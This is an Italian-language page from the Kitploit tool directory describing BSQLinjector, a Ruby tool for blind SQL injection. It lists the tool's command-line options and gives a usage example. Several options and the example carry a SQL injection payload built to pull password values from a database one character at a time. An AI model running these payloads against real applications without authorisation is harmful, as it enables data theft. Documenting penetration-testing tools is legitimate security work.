Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
BSQLinjector — Strumento di sfruttamento di blind SQL injection scritto in ruby. | Kitploit
Strumenti/GitHubGitHub/enjoiz/bsqlinjector
Analisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration Testing
GitHubenjoiz/bsqlinjector

BSQLinjector

Strumento di sfruttamento di blind SQL injection scritto in ruby.

Vedi Repository
10027501 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

BSQLinjector

BSQLinjector utilizza il metodo blind per recuperare dati da database SQL. Raccomando di usare lo switch "--test" per vedere chiaramente come appare il payload configurato prima di inviarlo a un'applicazione.

Opzioni:

root@kitploit:~
  --file	    Obbligatorio - File contenente una richiesta HTTP valida e il punto di SQL injection (SQLINJECT). (--file=/tmp/req.txt)
  --pattern	    Obbligatorio - Pattern da cercare quando la query è vera. (--pattern=truestatement)
  --prepend	    Obbligatorio - Payload principale. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append	    Come terminare il nostro payload. Per esempio commentare il resto della dichiarazione SQL. (--append='#)
  --schar	    Carattere posto intorno ai caratteri. Questo carattere non viene usato in modalità hex. (--schar="'")
  --2ndfile	    File contenente una richiesta HTTP valida usata nello sfruttamento di secondo ordine. (--2ndfile=/tmp/2ndreq.txt)

  --mode	    Modalità blind da usare - (between - b (genera meno richieste), moreless - a (genera meno richieste usando i caratteri "<", ">", "="), like - l (bruteforce completo), equals - e (bruteforce completo)). (--mode=l)
  --postgres        Usa "for" di postgres nella funzione substring (es. from 1 for 1).
  --hex		    Usa hex per confrontare invece di caratteri.
  --case	    Sensibilità alle maiuscole/minuscole.

  --ssl		    Usa SSL.
  --proxy	    Proxy da usare. (--proxy=127.0.0.1:8080)

  --test	    Abilita modalità test. Non inviare richiesta, mostra solo il payload completo.
  --special	    Includi tutti i caratteri speciali nell'enumerazione.
  --start	    Avvia enumerazione dal carattere specificato. (--start=10)
  --max		    Massimo di caratteri da enumerare. (--max=10)
  --timeout	    Timeout nell'attesa di risposte. (--timeout=20)
  --only-final	    Interrompi la visualizzazione di ogni lettera enumerata.
  --comma	    Codifica la virgola.
  --bracket	    Aggiungi parentesi alla fine della funzione substring. --bracket="))"
  --hexspace	    Usa spazio invece di parentesi per separare valori hex.
  --verbose	    Mostra messaggi dettagliati.
Scarica lo strumento

Esempio di utilizzo:

root@kitploit:~
  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

Dichiarazione di non responsabilità

Questo repository contiene uno strumento sviluppato strettamente per scopi educativi. Qualsiasi uso improprio dello strumento per attività illegali è severamente vietato.

Nota legale

È importante comprendere e rispettare tutte le leggi e i regolamenti locali relativi alla cybersecurity e all'hacking etico. L'accesso non autorizzato a sistemi informatici, reti o dati è illegale e punibile per legge. Lo sviluppatore di questo repository non è responsabile per qualsiasi uso improprio degli strumenti in esso contenuti.

Utilizzando gli strumenti in questo repository, accetti di usarli in modo responsabile ed etico. Ottieni sempre autorizzazione esplicita prima di testare o tentare di accedere a qualsiasi rete, sistema o dato che non ti appartiene.